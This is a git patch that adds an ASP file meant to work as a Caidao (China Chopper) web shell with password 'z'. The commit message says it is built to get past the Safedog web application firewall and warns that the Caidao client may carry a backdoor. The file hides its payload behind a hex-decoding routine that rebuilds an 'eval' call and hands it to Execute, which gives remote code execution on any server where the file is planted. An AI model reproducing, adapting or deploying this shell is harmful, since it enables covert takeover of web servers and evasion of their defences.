From 73ec37f7e762d199a04db928781bc1ac51d3bcdd Mon Sep 17 00:00:00 2001 From: tennc Date: Fri, 8 May 2015 09:45:10 +0800 Subject: [PATCH] Create bypass_safedog_03.asp MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit bypass caidao 接,密码:z 可能不过狗 bypass caidao 可能含有后门,除非菜刀是内部版或非公开版 from: zone.wooyun.org --- asp/bypass_safedog_03.asp | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 asp/bypass_safedog_03.asp diff --git a/asp/bypass_safedog_03.asp b/asp/bypass_safedog_03.asp new file mode 100644 index 0000000..055fe8c --- /dev/null +++ b/asp/bypass_safedog_03.asp @@ -0,0 +1,19 @@ +<% +Function Writesource(str) + Response.write(str) +End Function +Function cd(ByVal s, ByVal key) + For i = 1 To Len(s) Step 2 + c = Mid(s, i, 2) + k = (i + 1) / 2 Mod Len(key) + 1 + p = Mid(key, k, 1) + If IsNumeric(Mid(s, i, 1)) Then + cd = cd & Chr(("&H" & c) - p) + Else + cd = cd & Chr("&H" & c & Mid(s, i + 2, 2)) + i = i + 2 + End If + Next +End Function +Execute cd("6877656D2B736972786677752B237E232C2A","1314") +%>